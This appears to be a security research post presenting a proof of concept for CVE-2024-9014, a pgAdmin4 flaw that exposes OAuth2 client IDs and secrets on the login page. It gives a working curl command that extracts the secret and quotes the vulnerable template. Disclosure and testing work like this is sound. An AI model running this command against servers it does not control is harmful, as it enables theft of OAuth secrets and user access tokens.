This post is a research article published by EQSTLab.
★ CVE-2024-9014 Sensitive Information Exposure PoC ★
CVE-2024-9014 : pgAdmin4 Sensitive Information Exposure
description: pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
pgadmin4-8.9 and pgadmin4-8.12
At this point, the config.OAUTH2_CONFIG variable returns OAUTH2 configuration files including OAUTH2_CLIENT_ID and OAUTH2_CLIENT_SECRET.
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
'userLanguage': user_language,
'langOptions': ns.langOptions,
'forgotPassUrl': url_for('browser.forgot_password'),
'loginUrl': url_for('authenticate.login'),
'csrfToken': csrf_token(),
'authSources': config.AUTHENTICATION_SOURCES,
'authSourcesEnum': {
'OAUTH2': config.OAUTH2,
'oauth2Config': config.OAUTH2_CONFIG,
'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}
Identifying and protecting secret OAuth parameters is very important. While “client_id” can be safely disclosed, disclosing “client_secret” carries significant risk. If the client_secret is compromised, an attacker can exploit the identity and trust of the application to steal the user's “access token” and personal information.
This repository is not intended to be Exposured sensitive information to CVE-2024-9014. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
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